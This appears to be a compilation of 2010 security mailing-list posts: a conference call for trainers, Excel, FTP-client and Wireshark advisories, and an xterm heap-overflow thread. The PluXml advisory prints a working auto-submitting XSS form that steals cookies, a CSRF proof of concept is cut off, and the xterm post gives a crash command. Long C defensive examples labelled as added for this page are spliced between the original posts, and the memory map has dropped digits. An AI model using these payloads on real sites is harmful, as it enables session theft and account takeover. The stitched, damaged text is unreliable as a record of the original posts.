IBWAS and OWASP are currently soliciting training proposals for the OWASP Ibero-American Web Applications Security 2010 Conference (IBWAS'10), which will take place at ISCTE-IUL, Lisboa, Portugal, on November 24 through November 26, 2010. There will be training courses on November 24 followed by plenary sessions on the 25th and 26th with multiple tracks per day.

We are seeking training proposals on the following topics (in no particular order):

- Application Threat Modeling
- Business Risks with Application Security
- Hands-on Source Code Review
- Metrics for Application Security
- OWASP Tools and Projects
- Privacy Concerns with Applications and Data Storage
- Secure Coding Practices (J2EE/.NET)
- Starting and Managing Secure Development Lifecycle Programs
- Technology specific presentations on security such as AJAX, XML, etc.
- Web Application Security countermeasures
- Web Application Security Testing
- Web Services, XML and Application Security
- Anything else relating to OWASP and Application Security

Proposals on topics not listed above but related to the conference (i.e. which are related to Application Security) may also be accepted.

To make a submission you must fill out the form available at http://ibwas09.netmust.eu/files/ibwas10/OWASP_IBWAS_2010_CFT.rtf.zip and submit it by email to secretar...@ibwas.com.

Courses may be one day or half a day long. The proposals must respect the restrictions of the OWASP Speaker Agreement.

The conference will reward trainers with at least 30% of the total revenue of their courses, based on a minimum attendance. Courses that attract more students may be granted higher percentages. No other compensation (such as tickets or lodging) will be provided. If you require a different arrangement, please contact the conference chair at the email address below.

**Compensation**

Instructors and authors will be paid based on the number of students in their training sessions. If the training gathers only the minimum number of students, the compensation will be 30% of the revenue. For each group of 10 extra students enrolled, the compensation will be increased by 5% of the revenue, up to a maximum of 45% of the training revenue.

For example, a 1-day training with 10 to 19 students will generate a compensation of 30% of the revenue. For classes of 20 to 29 students, the compensation rises to 35% of the revenue.

In exceptional cases, different compensation schemes may be accepted. Please contact the conference organization team by email (secretar...@ibwas.com) for details.

**Training cost**

half-day training: 250 EUR per student
1-day training: 450 EUR per student

All prices in Euros (EUR)

**Minimum number of students**

half-day trainings: 10 students
1-day trainings: 20 students

**Important Dates:**

Submission deadline is October 13, 2010.
Notification of acceptance will be October 20, 2010.
Final version is due October 29, 2010.

The conference organization team may be contacted by email at secretar...@ibwas.com

For more information, please see the following web pages:

Conference Website: http://www.ibwas.com, http://www.owasp.org/index.php/IBWAS10
OWASP Speaker Agreement: http://www.owasp.org/index.php/Speaker_Agreement
OWASP Website: http://www.owasp.org
Easychair conference site: http://www.easychair.org/conferences/?conf=ibwas10
Presentation proposal form: http://ibwas09.netmust.eu/files/ibwas10/OWASP_IBWAS_2010_CFT.rtf.zip

** WARNING: Submissions without all the information requested in the proposal form will not be considered.

Please forward to all interested practitioners and colleagues.

--
Carlos Serrão
ISCTE-IUL/ISTA/DCTI | ADETTI-IUL/NetMuST | PT.OWASP
Secunia Research: Microsoft Excel Extra Out of Boundary Record Vulnerability
======================================================================
                     Secunia Research 12/10/2010

    - Microsoft Excel Extra Out of Boundary Record Vulnerability -

======================================================================
Table of Contents

Affected Software....................................................1
Severity.............................................................2
Vendor's Description of Software.....................................3
Description of Vulnerability.........................................4
Solution.............................................................5
Time Table...........................................................6
Credits..............................................................7
References...........................................................8
About Secunia........................................................9
Verification........................................................10

======================================================================
1) Affected Software

* Microsoft Excel 2002 SP3

NOTE: Other versions may also be affected.

======================================================================
2) Severity

Rating: Highly critical
Impact: System access
Where:  From remote

======================================================================
3) Vendor's Description of Software

Microsoft Office Excel is a powerful tool you can use to create and format spreadsheets, and analyze and share information to make more informed decisions.

Product Link:
http://office.microsoft.com/en-us/excel/default.aspx

======================================================================
4) Description of Vulnerability

Secunia Research has discovered a vulnerability in Microsoft Excel, which can be exploited by malicious people to compromise a user's system.

The vulnerability is caused by an error when processing Extra Out of Boundary records having an insufficient size and can be exploited to corrupt memory at an arbitrary memory address.

Successful exploitation may allow execution of arbitrary code.

======================================================================
5) Solution

Apply patches provided by MS10-080.

======================================================================
6) Time Table

23/04/2010 - Vendor notified.
24/04/2010 - Vendor response.
27/04/2010 - Vendor provides status update.
25/05/2010 - Vendor provides status update.
30/09/2010 - Vendor provides status update.
12/10/2010 - Public disclosure.

======================================================================
7) Credits

Discovered by Alin Rad Pop, Secunia Research.

======================================================================
8) References

The Common Vulnerabilities and Exposures (CVE) project has assigned CVE-2010-3239 for the vulnerability.

======================================================================
9) About Secunia

Secunia offers vulnerability management solutions to corporate customers with verified and reliable vulnerability intelligence relevant to their specific system configuration:

http://secunia.com/advisories/business_solutions/

Secunia also provides a publicly accessible and comprehensive advisory database as a service to the security community and private individuals, who are interested in or concerned about IT-security.

http://secunia.com/advisories/

Secunia believes that it is important to support the community and to do active vulnerability research in order to aid improving the security and reliability of software in general:

http://secunia.com/secunia_research/

Secunia regularly hires new skilled team members. Check the URL below to see currently vacant positions:

http://secunia.com/corporate/jobs/

Secunia offers a FREE mailing list called Secunia Security Advisories:

http://secunia.com/advisories/mailing_lists/

======================================================================
10) Verification

Please verify this advisory by visiting the Secunia website:
http://secunia.com/secunia_research/2010-63/

Complete list of vulnerability reports published by Secunia Research:
http://secunia.com/secunia_research/

======================================================================
Secunia Research: Microsoft Excel Lotus 1-2-3 File Parsing Vulnerability
== Secunia Research 12/10/2010 - Microsoft Excel Lotus 1-2-3 File Parsing Vulnerability - == Table of Contents Affected Software1 Severity.2 Vendor's Description of Software.3 Description of Vulnerability.4 Solution.5 Time Table...6 Credits..7 References...8 About Secunia9 Verification10 == 1) Affected Software * Microsoft Excel 2002 SP3 * Microsoft Excel 2003 SP3 NOTE: Other versions may also be affected. == 2) Severity Rating: Moderately critical Impact: System compromise Where: Remote == 3) Vendor's Description of Software Microsoft Office Excel is a powerful tool you can use to create and format spreadsheets, and analyze and share information to make more informed decisions.. Product Link: http://office.microsoft.com/excel == 4) Description of Vulnerability Secunia Research has discovered a vulnerability in Microsoft Excel, which can be exploited by malicious people to compromise a user's system. The vulnerability is caused by a boundary error in the parsing of certain records in Lotus 1-2-3 workbooks. This can be exploited to cause a heap-based buffer overflow via a Lotus 1-2-3 file containing a specially crafted, overly long record. Successful exploitation may allow execution of arbitrary code. == 5) Solution Apply patches provided by MS10-080. == 6) Time Table 09/04/2010 - Vendor notified. 09/04/2010 - Vendor response. 25/05/2010 - Vendor provides status update. 30/09/2010 - Vendor provides status update. 12/10/2010 - Public disclosure. == 7) Credits Discovered by Carsten Eiram, Secunia Research. == 8) References The Common Vulnerabilities and Exposures (CVE) project has assigned CVE-2010-3233 for the vulnerability. 
== 10) Verification

Please verify this advisory by visiting the Secunia website:
http://secunia.com/secunia_research/2010-55/

Complete list of vulnerability reports published by Secunia Research:
http://secunia.com/secunia_research/

==
Re: ubuntu 10.04 xterm heap overflow, can it be exploited?

This has already been made public:
http://lists.grok.org.uk/pipermail/full-disclosure/2010-September/076294.html

On Ubuntu, xterm is setgid utmp, which might make it an interesting target for local attacks. However, you'll need to check if it's already dropped group utmp privileges by the time this overflow happens. In either case, glibc heap protection probably makes this very difficult or impossible to exploit anyway.

-Dan

On Sun, Oct 10, 2010 at 11:07 PM, watercloud watercloud <watercl...@xfocus.org> wrote:

Hi, all!

I found that xterm on Ubuntu 10.04 has a local heap overflow; I don't know whether it can be exploited on glibc 2.11.

Detail:

watercl...@ubuntu:~/Downloads$ ls -l `which xterm`
-rwxr-sr-x 1 root utmp 35 2010-03-31 17:47 /usr/bin/xterm
watercl...@ubuntu:~/Downloads$ xterm -fb `perl -e 'print Ax4000'`
*** glibc detected *** xterm: munmap_chunk(): invalid pointer: 0x080bd314 ***
======= Backtrace: =========
/lib/tls/i686/cmov/libc.so.6(+0x6b591)[0x243591]
/lib/tls/i686/cmov/libc.so.6(+0x6c80e)[0x24480e]
xterm[0x8062c70]
xterm[0x8064b34]
xterm[0x805515d]
/usr/lib/libXt.so.6(+0x23e30)[0x4a2e30]
/usr/lib/libXt.so.6(+0x23fb5)[0x4a2fb5]
/usr/lib/libXt.so.6(XtRealizeWidget+0x9d)[0x4a325d]
xterm[0x8058176]
xterm[0x8069a08]
xterm[0x806bf78]
/lib/tls/i686/cmov/libc.so.6(__libc_start_main+0xe6)[0x1eebd6]
xterm[0x804d6a1]
======= Memory map: ========
0011-0012b000 r-xp 08:01 147 /lib/ld-2.11.1.so
0012b000-0012c000 r--p 0001a000 08:01 147 /lib/ld-2.11.1.so
0012c000-0012d000 rw-p 0001b000 08:01 147 /lib/ld-2.11.1.so
0012d000-0012e000 r-xp 00:00 0 [vdso]
0012e000-0014 r-xp 08:01 4191 /usr/lib/libXft.so.2.1.13
0014-00141000 r--p 00011000 08:01 4191 /usr/lib/libXft.so.2.1.13
00141000-00142000 rw-p 00012000 08:01 4191 /usr/lib/libXft.so.2.1.13
00142000-00198000 r-xp 08:01 2715 /usr/lib/libXaw7.so.7.0.0
00198000-00199000 r--p 00055000 08:01 2715 /usr/lib/libXaw7.so.7.0.0
00199000-0019f000 rw-p 00056000 08:01 2715 /usr/lib/libXaw7.so.7.0.0
0019f000-001a rw-p 00:00 0
001a-001d4000 r-xp 08:01 4408 /lib/libncurses.so.5.7
001d4000-001d5000 ---p 00034000 08:01 4408 /lib/libncurses.so.5.7
001d5000-001d7000 r--p 00034000 08:01 4408 /lib/libncurses.so.5.7
001d7000-001d8000 rw-p 00036000 08:01 4408 /lib/libncurses.so.5.7
001d8000-0032b000 r-xp 08:01 1050745 /lib/tls/i686/cmov/libc-2.11.1.so
0032b000-0032c000 ---p 00153000 08:01 1050745 /lib/tls/i686/cmov/libc-2.11.1.so
0032c000-0032e000 r--p 00153000 08:01 1050745 /lib/tls/i686/cmov/libc-2.11.1.so
0032e000-0032f000 rw-p 00155000 08:01 1050745 /lib/tls/i686/cmov/libc-2.11.1.so
0032f000-00332000 rw-p 00:00 0
00332000-0036 r-xp 08:01 850 /usr/lib/libfontconfig.so.1.4.4
0036-00361000 r--p 0002d000 08:01 850 /usr/lib/libfontconfig.so.1.4.4
00361000-00362000 rw-p 0002e000 08:01 850 /usr/lib/libfontconfig.so.1.4.4
00362000-0047b000 r-xp 08:01 4046 /usr/lib/libX11.so.6.3.0
0047b000-0047c000 r--p 00118000 08:01 4046 /usr/lib/libX11.so.6.3.0
0047c000-0047e000 rw-p 00119000 08:01 4046 /usr/lib/libX11.so.6.3.0
0047e000-0047f000 rw-p 00:00 0
0047f000-004ce000 r-xp 08:01 3718 /usr/lib/libXt.so.6.0.0
004ce000-004cf000 r--p 0004e000 08:01 3718 /usr/lib/libXt.so.6.0.0
004cf000-004d2000 rw-p 0004f000 08:01 3718 /usr/lib/libXt.so.6.0.0
004d2000-004e7000 r-xp 08:01 2723 /usr/lib/libXmu.so.6.2.0
004e7000-004e8000 r--p 00014000 08:01 2723 /usr/lib/libXmu.so.6.2.0
004e8000-004e9000 rw-p 00015000 08:01 2723 /usr/lib/libXmu.so.6.2.0
004e9000-004fe000 r-xp 08:01 4016 /usr/lib/libICE.so.6.3.0
004fe000-004ff000 r--p 00014000 08:01 4016 /usr/lib/libICE.so.6.3.0
004ff000-0050 rw-p 00015000 08:01 4016 /usr/lib/libICE.so.6.3.0
0050-00502000 rw-p 00:00 0
00502000-00573000 r-xp 08:01 2033 /usr/lib/libfreetype.so.6.3.22
00573000-00577000 r--p 0007 08:01 2033 /usr/lib/libfreetype.so.6.3.22
00577000-00578000 rw-p 00074000 08:01 2033 /usr/lib/libfreetype.so.6.3.22
00578000-0058 r-xp 08:01 4050 /usr/lib/libXrender.so.1.3.0
0058-00581000 r--p 7000 08:01 4050 /usr/lib/libXrender.so.1.3.0
00581000-00582000 rw-p 8000 08:01 4050 /usr/lib/libXrender.so.1.3.0
00582000-0059 r-xp 08:01 4091 /usr/lib/libXext.so.6.4.0
0059-00591000 r--p d000 08:01 4091 /usr/lib/libXext.so.6.4.0
00591000-00592000 rw-p e000 08:01 4091 /usr/lib/libXext.so.6.4.0
00592000-005a1000 r-xp 08:01 2709 /usr/lib/libXpm.so.4.11.0
005a1000-005a2000 r--p e000 08:01 2709 /usr/lib/libXpm.so.4.11.0
005a2000-005a3000 rw-p f000 08:01 2709 /usr/lib/libXpm.so.4.11.0
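Dan's caveat is the one that decides the impact here: the backtrace places the crash under XtRealizeWidget, so what matters is whether the process still holds group utmp at that point. The following is an added example written for this page, not xterm's code, showing how a setgid program can tell whether it still carries the file's group and how to give it up permanently before any untrusted input (here, resource strings such as -fb) is processed. It uses only getgid/getegid/setregid/setegid so that it builds without feature macros; the function names are this example's own.

```c
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>

/* Does the process still carry a group other than the caller's real group?
 * For a setgid binary the effective gid is the file's group (utmp in the
 * xterm case) until the program gives it up. Returns 1 if so, else 0. */
int holds_file_group(void) {
    return getegid() != getgid() ? 1 : 0;
}

/* Give the file group up permanently and verify the drop.
 * On Linux, setregid(rgid, rgid) also resets the saved set-group-ID when
 * the effective gid changes, so the group cannot be regained later.
 * Returns 0 on success, -1 if the kernel refused or the drop did not take.
 * A program that ignores this return value can carry the group into a
 * later memory-corruption crash, which is the scenario discussed above. */
int drop_file_group(void) {
    gid_t rgid = getgid();
    gid_t egid = getegid();
    if (egid == rgid)
        return 0;                        /* nothing to drop */
    if (setregid(rgid, rgid) != 0)
        return -1;
    if (getegid() != rgid)
        return -1;                       /* effective gid did not change */
    /* Regaining the old group must now fail; if it succeeds the saved gid
     * was not cleared and the process is still privileged. */
    if (setegid(egid) == 0) {
        (void)setregid(rgid, rgid);
        return -1;
    }
    return 0;
}

/* Stand-alone run: report gids before and after the drop. */
int main(void) {
    printf("before: real=%u effective=%u held=%d\n",
           (unsigned)getgid(), (unsigned)getegid(), holds_file_group());
    int rc = drop_file_group();
    printf("after:  real=%u effective=%u held=%d (rc=%d)\n",
           (unsigned)getgid(), (unsigned)getegid(), holds_file_group(), rc);
    return rc == 0 ? 0 : 1;
}
```

Run as an ordinary (non-setgid) binary the before and after lines are identical and the drop is a no-op; installed setgid utmp, the first line shows the utmp gid as effective and the second shows it gone. The regain test is the part that catches silent failures: a drop that "succeeded" but left the saved gid in place would otherwise look fine.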
Directory Traversal Vulnerability in FreshFTP
Vulnerability ID: HTB22628
Reference: http://www.htbridge.ch/advisory/directory_traversal_vulnerability_in_freshftp.html
Product: FreshFTP
Vendor: FreshWebMaster ( http://www.freshwebmaster.com )
Vulnerable Version: 5.36 and Probably Prior Versions
Vendor Notification: 27 September 2010
Vulnerability Type: Directory Traversal
Vulnerability Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response
Risk level: High
Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing (http://www.htbridge.ch/)

Vulnerability Details:
When exploited, this vulnerability allows an anonymous attacker to write files to specified locations on a user's system. The FTP client does not properly sanitise filenames containing directory traversal sequences that are received from an FTP server, for example a file named ..\..\..\..\..\..\..\somefile.exe. By tricking a user into downloading a directory from a malicious FTP server that contains files with backslash directory traversal sequences in their filenames, an attacker can potentially write files into the user's Startup folder to execute malicious code when the user logs on.
XSS vulnerability in PluXml
Vulnerability ID: HTB22632
Reference: http://www.htbridge.ch/advisory/xss_vulnerability_in_pluxml_1.html
Product: PluXml
Vendor: PluXml Team ( http://pluxml.org/ )
Vulnerable Version: 5.0.1 and probably prior versions
Vendor Notification: 29 September 2010
Vulnerability Type: XSS (Cross Site Scripting)
Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response
Risk level: Medium
Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing (http://www.htbridge.ch/)

Vulnerability Details:
A user can execute arbitrary JavaScript code within the vulnerable application. The vulnerability exists due to a failure in the /core/admin/article.php script to properly sanitize user-supplied input in the content variable. Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, or disclosure or modification of sensitive data. An attacker can use a browser to exploit this vulnerability. The following PoC is available:

<form action="http://host/core/admin/article.php" method="post" name="main">
<input type="hidden" name="artId" value="0001">
<input type="hidden" name="title" value="article title">
<input type="hidden" name="author" value="001">
<input type="hidden" name="chapo" value="">
<input type="hidden" name="content" value='page html content<script>alert(document.cookie)</script>'>
<input type="hidden" name="day" value="23">
<input type="hidden" name="month" value="09">
<input type="hidden" name="year" value="2010">
<input type="hidden" name="time" value="15:45">
<input type="hidden" name="catId[]" value="001">
<input type="hidden" name="new_catid" value="002">
<input type="hidden" name="new_catname" value="">
<input type="hidden" name="tags" value="PluXml">
<input type="hidden" name="allow_com" value="1">
<input type="hidden" name="url" value="article-page-url">
<input type="hidden" name="template" value="article.php">
<input type="hidden" name="preview" value="Aper&ccedil;u">
</form>
<script>
document.main.submit();
</script>
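The advisory's fix direction is output encoding of untrusted input before it reaches the page. The following is an added example for this page, not PluXml's code, written in C to match the rest of the examples here: a context-aware escaper for HTML text nodes and double-quoted attribute values, applied to the advisory's own payload as constructed input. The function names are this example's own.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Replacement for the five characters that can change meaning inside an
 * HTML text node or a double-quoted attribute value. Returns NULL for any
 * other byte so the caller copies it through unchanged. */
static const char *html_replacement(char c) {
    switch (c) {
    case '&':  return "&amp;";
    case '<':  return "&lt;";
    case '>':  return "&gt;";
    case '"':  return "&quot;";
    case '\'': return "&#39;";
    default:   return NULL;
    }
}

/* Escape `in` for insertion into HTML. Two passes: measure, then write, so
 * the output buffer is sized exactly and the write can never run past it.
 * Returns a malloc'd string the caller frees, or NULL on allocation failure. */
char *html_escape(const char *in) {
    size_t n = 0;
    for (const char *p = in; *p; p++) {
        const char *rep = html_replacement(*p);
        n += rep ? strlen(rep) : 1;
    }
    char *out = malloc(n + 1);
    if (out == NULL)
        return NULL;
    char *q = out;
    for (const char *p = in; *p; p++) {
        const char *rep = html_replacement(*p);
        if (rep) {
            size_t l = strlen(rep);
            memcpy(q, rep, l);
            q += l;
        } else {
            *q++ = *p;
        }
    }
    *q = '\0';
    return out;
}

/* Helper: does escaping `in` yield exactly `expected`? Frees its own result. */
int escapes_to(const char *in, const char *expected) {
    char *got = html_escape(in);
    if (got == NULL)
        return 0;
    int ok = strcmp(got, expected) == 0;
    free(got);
    return ok;
}

int main(void) {
    /* Constructed input: the payload from the PoC above. */
    const char *content = "page html content<script>alert(document.cookie)</script>";
    char *safe = html_escape(content);
    if (safe) {
        printf("<div class=\"content\">%s</div>\n", safe);
        free(safe);
    }
    return 0;
}
```

Escaping is the right tool only where the field is meant to hold plain text. The content field of a CMS article is meant to hold HTML, so for that case the server needs an allowlist sanitizer that keeps the permitted tags and attributes and drops everything else (script elements, event-handler attributes, javascript: URLs); escaping the whole value would break the feature rather than fix it.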
[ MDVSA-2010:200 ] wireshark
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

 _______________________________________________________________________

 Mandriva Linux Security Advisory                         MDVSA-2010:200
 http://www.mandriva.com/security/
 _______________________________________________________________________

 Package : wireshark
 Date    : October 13, 2010
 Affected: 2010.0, 2010.1, Corporate 4.0, Enterprise Server 5.0
 _______________________________________________________________________

 Problem Description:

 It was discovered that the ASN.1 BER dissector in wireshark was
 susceptible to a stack overflow (CVE-2010-3445).

 For 2010.0 and 2010.1, wireshark was upgraded to v1.2.12, which is not
 vulnerable to this issue; for CS4 and MES5 it was patched to resolve the
 vulnerability.
 _______________________________________________________________________

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=
 https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=5230
 http://www.wireshark.org/security/wnpa-sec-2010-11.html
 http://www.wireshark.org/security/wnpa-sec-2010-12.html
 _______________________________________________________________________

 Updated Packages:

 Mandriva Linux 2010.0:
 f40ac2df7d649771ca4436997815ff7d  2010.0/i586/dumpcap-1.2.12-0.1mdv2010.0.i586.rpm
 6b1ff44460cb8c2d13fe79a7727a7576  2010.0/i586/libwireshark0-1.2.12-0.1mdv2010.0.i586.rpm
 f1b70e6241c58b97fcaeb694801e939b  2010.0/i586/libwireshark-devel-1.2.12-0.1mdv2010.0.i586.rpm
 cd3df61a371dd1deccf8fd8fbca80aa7  2010.0/i586/rawshark-1.2.12-0.1mdv2010.0.i586.rpm
 960c3289f6e2185517161d9223476d97  2010.0/i586/tshark-1.2.12-0.1mdv2010.0.i586.rpm
 e46825ba00c144e3f4de545a7996c9ca  2010.0/i586/wireshark-1.2.12-0.1mdv2010.0.i586.rpm
 3c30f330037371e1d9f5abbe393e2950  2010.0/i586/wireshark-tools-1.2.12-0.1mdv2010.0.i586.rpm
 c872e89346410766c482dbf846883e3c  2010.0/SRPMS/wireshark-1.2.12-0.1mdv2010.0.src.rpm

 Mandriva Linux 2010.0/X86_64:
 92be514a497b7463a322d846e6b7e9f6  2010.0/x86_64/dumpcap-1.2.12-0.1mdv2010.0.x86_64.rpm
 90c09a2441ab754559cbd8ac8aff112c  2010.0/x86_64/lib64wireshark0-1.2.12-0.1mdv2010.0.x86_64.rpm
 779e8575d192294604fa65970edc5279  2010.0/x86_64/lib64wireshark-devel-1.2.12-0.1mdv2010.0.x86_64.rpm
 c7e58ccd2579d611b0cc30aeec55499f  2010.0/x86_64/rawshark-1.2.12-0.1mdv2010.0.x86_64.rpm
 5588757ab177b0992f0cef2a169fd922  2010.0/x86_64/tshark-1.2.12-0.1mdv2010.0.x86_64.rpm
 a5c953819a8ecbade91aa69a6a9ebf36  2010.0/x86_64/wireshark-1.2.12-0.1mdv2010.0.x86_64.rpm
 b2a51e06e507aab3af42db5bde28e6ea  2010.0/x86_64/wireshark-tools-1.2.12-0.1mdv2010.0.x86_64.rpm
 c872e89346410766c482dbf846883e3c  2010.0/SRPMS/wireshark-1.2.12-0.1mdv2010.0.src.rpm

 Mandriva Linux 2010.1:
 5c62d199b162f3234aa1b6bcd1b762a2  2010.1/i586/dumpcap-1.2.12-0.1mdv2010.1.i586.rpm
 f471133514b535a05e3ff34f6d143249  2010.1/i586/libwireshark0-1.2.12-0.1mdv2010.1.i586.rpm
 a9a220bbe0b0f00cb3fd4346f3840e4d  2010.1/i586/libwireshark-devel-1.2.12-0.1mdv2010.1.i586.rpm
 21029c832b5e55cc7b1a560d1c94d364  2010.1/i586/rawshark-1.2.12-0.1mdv2010.1.i586.rpm
 f6669ac7083215d23bdaf60c3bff67c2  2010.1/i586/tshark-1.2.12-0.1mdv2010.1.i586.rpm
 3e81b5bcf9921fac5ac5c1faee72dd59  2010.1/i586/wireshark-1.2.12-0.1mdv2010.1.i586.rpm
 a7290eb217dd4b33b309ef6012d6495a  2010.1/i586/wireshark-tools-1.2.12-0.1mdv2010.1.i586.rpm
 a163debb57786ad7e057be1adbc42dc6  2010.1/SRPMS/wireshark-1.2.12-0.1mdv2010.1.src.rpm

 Mandriva Linux 2010.1/X86_64:
 7404e0d17a12cae4bc0eab808b4c7910  2010.1/x86_64/dumpcap-1.2.12-0.1mdv2010.1.x86_64.rpm
 4a11c3b558b22da2a4992f316e172b76  2010.1/x86_64/lib64wireshark0-1.2.12-0.1mdv2010.1.x86_64.rpm
 fd8be9700208d2de0deb68b4c52dbf29  2010.1/x86_64/lib64wireshark-devel-1.2.12-0.1mdv2010.1.x86_64.rpm
 5c55ed9782c1c621bd6fbbc26d4e5a4f  2010.1/x86_64/rawshark-1.2.12-0.1mdv2010.1.x86_64.rpm
 b03b323ea0bca097af95a375b644f0db  2010.1/x86_64/tshark-1.2.12-0.1mdv2010.1.x86_64.rpm
 ac8a98fba0778c3b6e605dc56d685137  2010.1/x86_64/wireshark-1.2.12-0.1mdv2010.1.x86_64.rpm
 0441430e34ea5dad2fe88367c2d49a4f  2010.1/x86_64/wireshark-tools-1.2.12-0.1mdv2010.1.x86_64.rpm
 a163debb57786ad7e057be1adbc42dc6  2010.1/SRPMS/wireshark-1.2.12-0.1mdv2010.1.src.rpm

 Corporate 4.0:
 a1587f7fd3ad986b4c77b4fefc7cffe4  corporate/4.0/i586/dumpcap-1.0.15-0.2.20060mlcs4.i586.rpm
 b549bc8586bec1a9d39a52c483086a74  corporate/4.0/i586/libwireshark0-1.0.15-0.2.20060mlcs4.i586.rpm
 ad5189043e06c0ca244dadbef04713ae  corporate/4.0/i586/libwireshark-devel-1.0.15-0.2.20060mlcs4.i586.rpm
 12271d314116cbbcae2752103e2c2833  corporate/4.0/i586/rawshark-1.0.15-0.2.20060mlcs4.i586.rpm
 902578159f4ac5e1c6cb46b694abfbd6  corporate/4.0/i586/tshark-1.0.15-0.2.20060mlcs4.i586.rpm
 4ec8f9b9d98406b4b66058d187449447  corporate/4.0/i586/wireshark-1.0.15-0.2.20060mlcs4.i586.rpm
 457d599fcff364ff83f781536319bde0  corporate/4.0/i586/wireshark-tools-1.0.15-0.2.20060mlcs4.i586.rpm
 237f35e28dde484145ea6818d3bdeb35
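The advisory says only that the BER dissector "was susceptible to a stack overflow" and does not give the mechanism. One way a recursive TLV dissector can exhaust its stack is by following constructed elements to unbounded depth, so the following added example, written for this page and not taken from Wireshark, shows a minimal BER walker with the two guards a dissector needs: a hard nesting limit and a check of every declared length against the bytes actually present. It assumes definite-form lengths only (indefinite form is rejected as unsupported) and the sample encodings are constructed; the function names are this example's own.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

#define MAX_DEPTH 32          /* recursion budget; each level is one stack frame */

enum ber_status { BER_OK = 0, BER_TRUNCATED = 1, BER_BAD_LENGTH = 2, BER_TOO_DEEP = 3 };

/* Walk a sequence of BER TLVs in p[0..n). Counts every element in *elems and
 * descends into constructed elements (tag bit 0x20). Depth is checked on
 * entry, so an input that nests more than MAX_DEPTH levels is refused
 * before it can grow the stack any further. */
static enum ber_status walk(const uint8_t *p, size_t n, int depth, size_t *elems) {
    size_t off = 0;
    if (depth > MAX_DEPTH)
        return BER_TOO_DEEP;
    while (off < n) {
        if (n - off < 2)
            return BER_TRUNCATED;              /* need at least tag + length byte */
        uint8_t tag = p[off++];
        uint8_t l0  = p[off++];
        size_t len;
        if (l0 < 0x80) {
            len = l0;                          /* short form */
        } else if (l0 == 0x80) {
            return BER_BAD_LENGTH;             /* indefinite form: not supported here */
        } else {
            unsigned nb = l0 & 0x7F;           /* long form: nb length bytes follow */
            if (nb > sizeof(size_t) || nb > n - off)
                return BER_BAD_LENGTH;
            len = 0;
            for (unsigned i = 0; i < nb; i++)
                len = (len << 8) | p[off++];
        }
        if (len > n - off)
            return BER_TRUNCATED;              /* declared length overruns the buffer */
        (*elems)++;
        if (tag & 0x20) {                      /* constructed: contents are TLVs too */
            enum ber_status s = walk(p + off, len, depth + 1, elems);
            if (s != BER_OK)
                return s;
        }
        off += len;
    }
    return BER_OK;
}

enum ber_status ber_walk(const uint8_t *p, size_t n, size_t *elems) {
    *elems = 0;
    return walk(p, n, 0, elems);
}

/* Constructed sample: SEQUENCE { INTEGER 5, SEQUENCE { OCTET STRING "ab" } } */
static const uint8_t SAMPLE[] = { 0x30, 0x09, 0x02, 0x01, 0x05, 0x30, 0x04, 0x04, 0x02, 0x61, 0x62 };
/* Constructed sample: SEQUENCE claiming 5 content bytes, only 2 present. */
static const uint8_t TRUNCATED[] = { 0x30, 0x05, 0x02, 0x01 };

enum ber_status sample_status(void)    { size_t e; return ber_walk(SAMPLE, sizeof SAMPLE, &e); }
size_t          sample_elements(void)  { size_t e; ber_walk(SAMPLE, sizeof SAMPLE, &e); return e; }
enum ber_status truncated_status(void) { size_t e; return ber_walk(TRUNCATED, sizeof TRUNCATED, &e); }

/* Build `levels` nested empty SEQUENCEs (each level 2 bytes, so short-form
 * lengths suffice for levels <= 64) and walk the result. */
enum ber_status nested_status(int levels) {
    uint8_t buf[128];
    size_t e;
    if (levels < 1 || levels > 64)
        return BER_BAD_LENGTH;
    for (int i = 0; i < levels; i++) {
        buf[2 * i]     = 0x30;
        buf[2 * i + 1] = (uint8_t)(2 * (levels - 1 - i));
    }
    return ber_walk(buf, (size_t)(2 * levels), &e);
}

int main(void) {
    printf("sample: status %d, %zu elements\n", sample_status(), sample_elements());
    printf("truncated: status %d\n", truncated_status());
    printf("nested x10: status %d, nested x40: status %d\n", nested_status(10), nested_status(40));
    return 0;
}
```

The depth limit is a policy number, not a protocol constant: real-world ASN.1 rarely nests more than a handful of levels, so a limit of a few dozen costs nothing legitimate while capping stack use at a known multiple of one frame.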
Directory Traversal Vulnerability in AnyConnect
Vulnerability ID: HTB22629
Reference: http://www.htbridge.ch/advisory/directory_traversal_vulnerability_in_anyconnect.html
Product: AnyConnect
Vendor: AnyConnect ( http://www.anyconnect.net )
Vulnerable Version: 1.2.3.0 and Probably Prior Versions
Vendor Notification: 27 September 2010
Vulnerability Type: Directory Traversal
Vulnerability Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response
Risk level: High
Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing (http://www.htbridge.ch/)

Vulnerability Details:
When exploited, this vulnerability allows an anonymous attacker to write files to specified locations on a user's system. The FTP client does not properly sanitise filenames containing directory traversal sequences that are received from an FTP server, for example a file named ..\..\..\..\..\..\..\somefile.exe. By tricking a user into downloading a directory from a malicious FTP server that contains files with backslash directory traversal sequences in their filenames, an attacker can potentially write files into the user's Startup folder to execute malicious code when the user logs on.
XSRF (CSRF) in Lara
Vulnerability ID: HTB22619
Reference: http://www.htbridge.ch/advisory/xsrf_csrf_in_lara.html
Product: Lara
Vendor: Geographical Media ( http://getlara.com/ )
Vulnerable Version: Current at 18.09.2010 and Probably Prior Versions
Vendor Notification: 27 September 2010
Vulnerability Type: CSRF (Cross-Site Request Forgery)
Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response
Risk level: Low
Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing (http://www.htbridge.ch/)

Vulnerability Details:
The vulnerability exists due to a failure in the /_ui/changepassword script to properly verify the source of the HTTP request. Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, or disclosure or modification of sensitive data. An attacker can use a browser to exploit this vulnerability. The following PoC is available:

<form method="POST" name="m" action="http://host//_ui/changepassword?method=UpdatePassword&type=get">
